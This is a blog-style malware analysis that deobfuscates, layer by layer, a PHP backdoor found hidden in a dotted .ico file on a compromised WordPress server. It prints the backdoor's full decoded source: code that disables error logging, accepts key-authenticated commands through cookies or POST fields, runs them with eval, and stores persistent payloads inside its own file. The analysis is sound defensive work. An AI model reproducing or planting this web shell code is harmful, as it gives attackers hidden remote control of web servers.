Presented by Tim

Follow me on Twitter

Update - Part 2

I was asked earlier this week by a friend to have a look at some malware, which had been uncovered on a compromised computer. I didn’t ask where it had came from, or indeed the host environmnet. Having programmed in PHP since university and malware analysis is kind of a hobby, I thought I would give it a go.

Before going any further, I used one of my kali linux VMs, with PHP installed on it. The VM was isolated from the internet, and from even the host machine. I took a snapshot of the machine before introducing the malware, to make sure I could restore the VM to a known good state if all things went wrong.

Layer 1 - The XOR

Starting to examine the malware, the first thing I noticed was that the malware was not without it’s defenses to resist analysis. The code reproduced below, has had several parts removed, to aid reading.

<?php $_20lsq = basename/*hce*/(/*a*/trim/*q13*/(/*w*/preg_replace/*zsgp*/(/*12x*/rawurldecode/*xnrbo*/(/*lq8*/"%2F%5C%28.%2A%24%2F"/*vky*/)/*b*/, '', __FILE__/*1q*/)/*8redn*//*ijdno*/)/*lq*//*m*/)/*z3*/;$_1j87lwe = "GQ%19%1FE%02V%02%08%40%0C%07G%09DME%01%07%5E%3B%02A%07%17%0AVCfT%16%03R%10%04%0ENJF%24L3S%01%00Z%0A% ... ";eval/*p1ah*/(/*d5nsu*/rawurldecode/*jrp*/(/*k2zm*/$_1j87lwe/*p*/)/*l48*/ ^ substr/*2g8v*/(/*dp6xa*/str_repeat/*7tld1*/(/*apu46*/$_20lsq, /*7bv4*/(/*34w*/strlen/*sgvwq*/(/*lgy*/$_1j87lwe/*a9*/)/*0ny*//strlen/*a47*/(/*i*/$_20lsq/*mw*/)/*hlzo6*//*6r1*/)/*tlpj*/ + 1/*a*/)/*h*/, 0, strlen/*9fgb*/(/*u*/$_1j87lwe/*pk*/)/*6ax*//*igy*/)/*bh*//*5*/)/*9w*/;

The comments in PHP were quite annoying. Fortunately, PHP has a built in function for removing comments. After all, who comments code anyway? :-) Running “php -w ” stripped the code of the comments. The comments are quite distracting from the analysis point of view. Now to find out what is actually going on. The code itself is actually 3 code lines, all mashed up in to one line. visually a pain, functionally ok. Separating out the code to 3 lines, and removing the comments gives us

<?php $_20lsq = basename(trim(preg_replace(rawurldecode("%2F%5C%28.%2A%24%2F"), '', __FILE__))); $_1j87lwe = "GQ%19%1FE%02V%02%08%40%0C%07G%09DME%01%07%5E%3B%02A%07%17%0AVCfT%16%03R%10%04%0ENJF%24L3S%01%00Z%0A% ... "; eval(rawurldecode($_1j87lwe) ^ substr(str_repeat($_20lsq, (strlen($_1j87lwe)/strlen($_20lsq)) + 1), 0, strlen($_1j87lwe)));

Not that it looks vastly better, but it does help performing the analysis. So looking at line 1, we can see that it is using the path and filename of itself for some purpose. A purpose that involves urlencoded strings, a replacement of characters and stripping some characters. Fortunately, the easiest way to find out what happening is to just echo out the variable. Doing this echo revealed that the variable contained the exact name of the file. I had originally been given the file via pastebin. I asked, and was given the original file. The extension was an ico (icon) type. The file name also started with a dot (.), which is the way of making a hidden file in Linux / Unix.

The second string appeared to be encoded text, which left the third to look at. On further inspection, renaming the 2 strings to var_a and var_b made the code clearer. So the malware takes the filename (var_a) repeatedly until it is the length of the encoded string, once that has been raw url dedcoded. The decoded second variable (var_b) is then XOR’d with string made from var_a. Changing the eval to an echo and running the code, piped to a new file allowed the first layer to peel away.

Layer 2 - Character Substitution

The next layer wasn’t quite as tricky. Below is a truncated output from the first layer. Again, comments have creeped back it.

if (!defined('stream_context_create ')) { define('stream_context_create ', 1); $oigad = 3910; function inbqn($egepmaje, $ealwaknj){$oyjwthy = ''; for($i=0; $i < strlen($egepmaje); $i++){$oyjwthy .= isset($ealwaknj[$egepmaje[$i]]) ? $ealwaknj[$egepmaje[$i]] : $egepmaje[$i];} $zcudgqmmyb="rawurl" . "decode";return $zcudgqmmyb($oyjwthy);} $zogyxk = '%hW%hd%hW%hd%6hgBg_SXo%pM%pwXtt8t_i8k%pw%pc%phDTrr%'. 'p7%FP%hW%hd%6hgBg_SXo%pM%pwi8k_Xtt8tS%pw%pc%phh%p7%FP%hW%hd%6hgBg_SXo%pM%pwmLV'. '_XVXGzog8B_ogmX%pw%pc%phh%p7%FP%hW%hd%6hXtt8t_tXj8togBk%pMh%p7%FP%hW%hd%6hSXo_ogmX_'. 'igmgo%pMh%p7%FP%hW%hd%hW%hd%hW%hdgx%pM%pRYXxgBXY%pM%ppIuI_1Cr%pp%p7%p7%hW%hd%wP%hW%hd%ph'. ... 'VgG%pM%p7%FP%hW%hd%wW'; $nudubg = Array('1'=>'E', '0'=>'z', '3'=>'6', '2'=>'V', '5'=>'y', '4'=>'v', '7'=>'9', '6'=>'4', '9'=>'W', '8'=>'o', 'A'=>'q', 'C'=>'O', 'B'=>'n', 'E'=>'M', 'D'=>'N', 'G'=>'c', 'F'=>'3', 'I'=>'P', 'H'=>'Z', 'K'=>'G', 'J'=>'h', 'M'=>'8', 'L'=>'a', 'O'=>'5', 'N'=>'b', 'Q'=>'R', 'P'=>'B', 'S'=>'s', 'R'=>'1', 'U'=>'K', 'T'=>'U', 'W'=>'D', 'V'=>'x', 'Y'=>'d', 'X'=>'e', 'Z'=>'j', 'a'=>'J', 'c'=>'C', 'b'=>'X', 'e'=>'S', 'd'=>'A', 'g'=>'i', 'f'=>'w', 'i'=>'l', 'h'=>'0', 'k'=>'g', 'j'=>'p', 'm'=>'m', 'l'=>'Y', 'o'=>'t', 'n'=>'k', 'q'=>'I', 'p'=>'2', 's'=>'F', 'r'=>'L', 'u'=>'H', 't'=>'r', 'w'=>'7', 'v'=>'Q', 'y'=>'T', 'x'=>'f', 'z'=>'u'); eval/*fxkn*/(inbqn($zogyxk, $nudubg)); }

So the first thing to notice is that the malware is checking to see if it is already present, and been defined. If it hasn’t, then it defines itself.

The array that is assigned to $nudubg is interesting. It is defining a text substitution. We can also see that the words “rawurl” and “decode” are added together. We also have a very long obfuscated string. To prove this theory, I again replaced the eval with an echo, and ran the code, redirected to an new file. Lo and behold, the second layer peels away, and now we are on the main functions of the malware.

Layer 3 - The Malware laid bare. Kind of.

The full function of the malware was now visible. Well, ish. The code had the same issue that disassemblers have in one regards. The variable and function names had been turned completely useless. They still did their function, they just didn’t mean anything directly. Fortunately for us, parts of it can’t be hidden. The built in function names are still there. This at least gives us a clue to the operation of the functions, and of course the variables that they act upon.

@ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @error_reporting(0); @set_time_limit(0); if(!defined("PHP_EOL")) { define("PHP_EOL", "

"); } if(!defined("DIRECTORY_SEPARATOR")) { define("DIRECTORY_SEPARATOR", "/"); } if (!defined('file_put_contents ')) { define('file_put_contents ', 1); $hxgqukcsofcc = '9ac350bf-7b05-4f25-8195-ce44380aafa9'; global $hxgqukcsofcc; function ytkpmfs($uytczn) { if (strlen($uytczn) < 4) { return ""; } $gncokyyz = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $lchuml = str_split($gncokyyz); $lchuml = array_flip($lchuml); $fxffhl = 0; $exvpmz = ""; $uytczn = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $uytczn); do { $xvucbwjn = $lchuml[$uytczn[$fxffhl++]]; $mepije = $lchuml[$uytczn[$fxffhl++]]; $sbhobs = $lchuml[$uytczn[$fxffhl++]]; $uovgupr = $lchuml[$uytczn[$fxffhl++]]; $uumyba = ($xvucbwjn << 2) | ($mepije >> 4); $qkplpbs = (($mepije & 15) << 4) | ($sbhobs >> 2); $altlvy = (($sbhobs & 3) << 6) | $uovgupr; $exvpmz = $exvpmz . chr($uumyba); if ($sbhobs != 64) { $exvpmz = $exvpmz . chr($qkplpbs); } if ($uovgupr != 64) { $exvpmz = $exvpmz . chr($altlvy); } } while ($fxffhl < strlen($uytczn)); return $exvpmz; } if (!function_exists('file_put_contents')) { function file_put_contents($gnlmabhg, $hxgqukc, $gohjysrt = False) { $pxwcutl = $gohjysrt == 8 ? 'a' : 'w'; $hzrhdgnp = @fopen($gnlmabhg, $pxwcutl); if ($hzrhdgnp === False) { return 0; } else { if (is_array($hxgqukc)) $hxgqukc = implode($hxgqukc); $ajhhwvnq = fwrite($hzrhdgnp, $hxgqukc); fclose($hzrhdgnp); return $ajhhwvnq; } } } if (!function_exists('file_get_contents')) { function file_get_contents($mcyjre) { $skcxhwyt = fopen($mcyjre, "r"); $bnnulsb = fread($skcxhwyt, filesize($mcyjre)); fclose($skcxhwyt); return $bnnulsb; } } function dbkboso() { return trim(preg_replace("/\(.*\$/", '', __FILE__)); } function veyrrpc($vpfasf, $wyolccwj) { $rqlhqkbu = ""; for ($fxffhl=0; $fxffhl<strlen($vpfasf);) { for ($jlamhp=0; $jlamhp<strlen($wyolccwj) && $fxffhl<strlen($vpfasf); $jlamhp++, $fxffhl++) { $rqlhqkbu .= chr(ord($vpfasf[$fxffhl]) ^ ord($wyolccwj[$jlamhp])); } } return $rqlhqkbu; } function umzklia($vpfasf, $wyolccwj) { global $hxgqukcsofcc; return veyrrpc(veyrrpc($vpfasf, $wyolccwj), $hxgqukcsofcc); } function meyfzju($vpfasf, $wyolccwj) { global $hxgqukcsofcc; return veyrrpc(veyrrpc($vpfasf, $hxgqukcsofcc), $wyolccwj); } function ymjxpja() { $gnlmabhgcmqoues = @file_get_contents(dbkboso()); $ugpdjjik = strpos($gnlmabhgcmqoues, md5(dbkboso())); if ($ugpdjjik !== FALSE) { $wovbwub = substr($gnlmabhgcmqoues, $ugpdjjik + 32); $hzrhdgnprrmsrj = @unserialize(umzklia(rawurldecode($wovbwub), md5(dbkboso()))); } else { $hzrhdgnprrmsrj = Array(); } return $hzrhdgnprrmsrj; } function ifqhsss($hzrhdgnprrmsrj) { $qhuznb = rawurlencode(meyfzju(@serialize($hzrhdgnprrmsrj), md5(dbkboso()))); $gnlmabhgcmqoues = @file_get_contents(dbkboso()); $ugpdjjik = strpos($gnlmabhgcmqoues, md5(dbkboso())); if ($ugpdjjik !== FALSE) { $yblkqeg = substr($gnlmabhgcmqoues, $ugpdjjik + 32); $gnlmabhgcmqoues = str_replace($yblkqeg, $qhuznb, $gnlmabhgcmqoues); } else { $gnlmabhgcmqoues = $gnlmabhgcmqoues . "



//" . md5(dbkboso()) . $qhuznb; } @file_put_contents(dbkboso(), $gnlmabhgcmqoues); } function bushzx($rpznkysa, $zmhagl) { $hzrhdgnprrmsrj = ymjxpja(); $hzrhdgnprrmsrj[$rpznkysa] = ytkpmfs($zmhagl); ifqhsss($hzrhdgnprrmsrj); } function uzzylcyq($rpznkysa) { $hzrhdgnprrmsrj = ymjxpja(); unset($hzrhdgnprrmsrj[$rpznkysa]); ifqhsss($hzrhdgnprrmsrj); } function wzuxic($rpznkysa=NULL) { foreach (ymjxpja() as $khaklrbh=>$unqrza) { if ($rpznkysa) { if (strcmp($rpznkysa, $khaklrbh) == 0) { eval($unqrza); break; } } else { eval($unqrza); } } } foreach (array_merge($_COOKIE, $_POST) as $cedxbvcy => $vpfasf) { $vpfasf = @unserialize(umzklia(ytkpmfs($vpfasf), $cedxbvcy)); if (isset($vpfasf['ak']) && $hxgqukcsofcc==$vpfasf['ak']) { if ($vpfasf['a'] == 'i') { $fxffhl = Array( 'pv' => @phpversion(), 'sv' => '2.0-1', 'ak' => $vpfasf['ak'], ); echo @serialize($fxffhl); exit; } elseif ($vpfasf['a'] == 'e') { eval($vpfasf['d']); } elseif ($vpfasf['a'] == 'plugin') { if($vpfasf['sa'] == 'add') { bushzx($vpfasf['p'], $vpfasf['d']); } elseif($vpfasf['sa'] == 'rem') { uzzylcyq($vpfasf['p']); } } echo $vpfasf['ak']; exit(); } } wzuxic(); }

Above is the full code, as decoded from the layers of obfuscation. In order to figure out what this malware did, I started with 2 functions that the malware defined:

function dbkboso() { return trim(preg_replace("/\(.*\$/", '', __FILE__)); } function veyrrpc($vpfasf, $wyolccwj) { $rqlhqkbu = ""; for ($fxffhl=0; $fxffhl<strlen($vpfasf);) { for ($jlamhp=0; $jlamhp<strlen($wyolccwj) && $fxffhl<strlen($vpfasf); $jlamhp++, $fxffhl++) { $rqlhqkbu .= chr(ord($vpfasf[$fxffhl]) ^ ord($wyolccwj[$jlamhp])); } } return $rqlhqkbu; }

These functions were relatively small. The game here is to figure out what they do, and give the functions, along with arguments reasonable names. The first function, being only a one-liner, is quite straight forward. It just returns the filename of the malware. I decided to call the function get_filename, and proceed to change all instances of dbkboso to get_filename.

The second function looked a bit more complicated. The first thing I did was replace $vpfasf and $wyolccwj with $arg_1 and $arg_2 respectively. Changing $rqlhqkbu to $return_string also help. This made our new function look like this:

function veyrrpc($arg_1, $arg_2) { $return_string = ""; for ($fxffhl=0; $fxffhl<strlen($arg_1);) { for ($jlamhp=0; $jlamhp<strlen($arg_2) && $fxffhl<strlen($arg_1); $jlamhp++, $fxffhl++) { $return_string .= chr(ord($arg_1[$fxffhl]) ^ ord($arg_2[$jlamhp])); } } return $return_string; }

Clearer, but not 100%. The last 2 changes I made were $fxffhl for $i and $jlamhp for $j, since they seemed to be looping variables. This gives us the following:

function veyrrpc($arg_1, $arg_2) { $return_string = ""; for ($i=0; $i<strlen($arg_1);) { for ($j=0; $j<strlen($arg_2) && $i<strlen($arg_1); $j++, $i++) { $return_string .= chr(ord($arg_1[$i]) ^ ord($arg_2[$j])); } } return $return_string; }

From the newly decoded function, we can deduce that it is producing the xor of arg_1 and arg_2. I renamed the function veyrrpc to XOR through out the code. In doing so, the next 2 parts which became interesting were:

function umzklia($vpfasf, $wyolccwj) { global $hxgqukcsofcc; return veyrrpc(veyrrpc($vpfasf, $wyolccwj), $hxgqukcsofcc); } function meyfzju($vpfasf, $wyolccwj) { global $hxgqukcsofcc; return veyrrpc(veyrrpc($vpfasf, $hxgqukcsofcc), $wyolccwj); }

To add a slight bit of context the global variable, $hxgqukcsofcc was defined else where in the code, but is a constant. As I hadn’t found out too much about this variable, I had actually labelled it “stringa”. Putting in what we know about the XOR function, and subsituting the variables names for some simple names gave:

function umzklia($arg_1, $arg_2) { global $stringa; return XOR(XOR($arg_1, $arg_2), $stringa); } function meyfzju($arg_1, $wyolccwj) { global $stringa; return XOR(XOR($arg_1, $stringa), $arg_2); }

I gave the functions the names xortype1 and xortype2 and repopulated them through out the rest of the code. The 2 functions analysed were the opposite of each other. At this point, I didn’t know which was which and they would both work as either.

The next pair of functions under examination where:

function ymjxpja() { $gnlmabhgcmqoues = @file_get_contents(dbkboso()); $ugpdjjik = strpos($gnlmabhgcmqoues, md5(dbkboso())); if ($ugpdjjik !== FALSE) { $wovbwub = substr($gnlmabhgcmqoues, $ugpdjjik + 32); $hzrhdgnprrmsrj = @unserialize(umzklia(rawurldecode($wovbwub), md5(dbkboso()))); } else { $hzrhdgnprrmsrj = Array(); } return $hzrhdgnprrmsrj; } function ifqhsss($hzrhdgnprrmsrj) { $qhuznb = rawurlencode(meyfzju(@serialize($hzrhdgnprrmsrj), md5(dbkboso()))); $gnlmabhgcmqoues = @file_get_contents(dbkboso()); $ugpdjjik = strpos($gnlmabhgcmqoues, md5(dbkboso())); if ($ugpdjjik !== FALSE) { $yblkqeg = substr($gnlmabhgcmqoues, $ugpdjjik + 32); $gnlmabhgcmqoues = str_replace($yblkqeg, $qhuznb, $gnlmabhgcmqoues); } else { $gnlmabhgcmqoues = $gnlmabhgcmqoues . "



//" . md5(dbkboso()) . $qhuznb; } @file_put_contents(dbkboso(), $gnlmabhgcmqoues); }

The main reason for examination together, is they appeared to be similar jobs. Once they were decoded, it turned out that assumption was correct. As we have decoded some parts already, we can see that the first couple of lines of the first function are storing the contents of the malware in a variable. It then checks to see if it can find the md5 of the filename within the file, and saves the offset. If the offset is found, the contents read in to a new variable. The read starts 32 characters after the offset, due to the size of the md5. The contents are then decoded using the xortype1 function, and the md5 as the second argument. If the offset is not found, a blank array is initialized.

The second function does a similar job, in that it encodes serialized data, and then stores it at the correct offset. The majority of the functions are now exposed to us, and we can see the basic behaviour of the malware. At this point, there are 3 main functions left to analyse. These are:

function bushzx($rpznkysa, $zmhagl) { $hzrhdgnprrmsrj = ymjxpja(); $hzrhdgnprrmsrj[$rpznkysa] = ytkpmfs($zmhagl); ifqhsss($hzrhdgnprrmsrj); } function uzzylcyq($rpznkysa) { $hzrhdgnprrmsrj = ymjxpja(); unset($hzrhdgnprrmsrj[$rpznkysa]); ifqhsss($hzrhdgnprrmsrj); } function wzuxic($rpznkysa=NULL) { foreach (ymjxpja() as $khaklrbh=>$unqrza) { if ($rpznkysa) { if (strcmp($rpznkysa, $khaklrbh) == 0) { eval($unqrza); break; } } else { eval($unqrza); } } }

The first 2 functions appear to be a pair again, as they both end by calling the function which encodes and stores data in the file. They also both start by calling the function which gets the data out of the file too. The second function removes the data (using PHP’s built in unset command), the other uses a function that I had skipped over. Looking back on that function, I made the assumption this was an encoding or decoding function, and the string array within it looked very familiar to me. It is the same character string used in base64 encoding. While I did decode this function (ytkpmfs) and found it to be base64 decoding, I haven’t included the decoding here, and left as an exercise for the reader.

The last function (which is called at the end of the program) appears to run values from an array. This is likely to be the mechanism for how the commands are executed.

The last part of the code which I haven’t decoded so far looks quite distinctive.

foreach (array_merge($_COOKIE, $_POST) as $cedxbvcy => $vpfasf) { $vpfasf = @unserialize(umzklia(ytkpmfs($vpfasf), $cedxbvcy)); if (isset($vpfasf['ak']) && $hxgqukcsofcc==$vpfasf['ak']) { if ($vpfasf['a'] == 'i') { $fxffhl = Array( 'pv' => @phpversion(), 'sv' => '2.0-1', 'ak' => $vpfasf['ak'], ); echo @serialize($fxffhl); exit; } elseif ($vpfasf['a'] == 'e') { eval($vpfasf['d']); } elseif ($vpfasf['a'] == 'plugin') { if($vpfasf['sa'] == 'add') { bushzx($vpfasf['p'], $vpfasf['d']); } elseif($vpfasf['sa'] == 'rem') { uzzylcyq($vpfasf['p']); } } echo $vpfasf['ak']; exit(); } }

The main part that looked distinctive was the array:

$fxffhl = Array( 'pv' => @phpversion(), 'sv' => '2.0-1', 'ak' => $vpfasf['ak'], );

The main reason this looked distinctive was that it isn’t encoded at all. The variable name is, but the rest of it is unlikely to be. The indexes of the arrays can’t be as that would change the behaviour of the program. A bit of googling found the a Stack Overflow link

Decoding the last part of the malware using vaiable name substitution gave me:

foreach (array_merge($_COOKIE, $_POST) as $parameters => $param) { $param = @unserialize(xortype1(b64de($param), $parameters)); if (isset($param['ak']) && $stringa==$param['ak']) { if ($param['a'] == 'i') { $fxffhl = Array( 'pv' => @phpversion(), 'sv' => '2.0-1', 'ak' => $param['ak'], ); echo @serialize($fxffhl); exit; } elseif ($param['a'] == 'e') { eval($param['d']); } elseif ($param['a'] == 'plugin') { if($param['sa'] == 'add') { bushzx($param['p'], $param['d']); } elseif($param['sa'] == 'rem') { uzzylcyq($param['p']); } } echo $param['ak']; exit(); } }

Conclusion

The malware appears to be a backdoor and it was spread liberally around the wordpress server. As mentioned in the stackoverflow link, Yara rules can detect the obfuscated malware.

Malware analysis in PHP is straight forward, but does require patience. Evals can be swapped out for echos, and (although not used for this), PHP has a debugger (xdebug). In future, I may make a post about this debugger.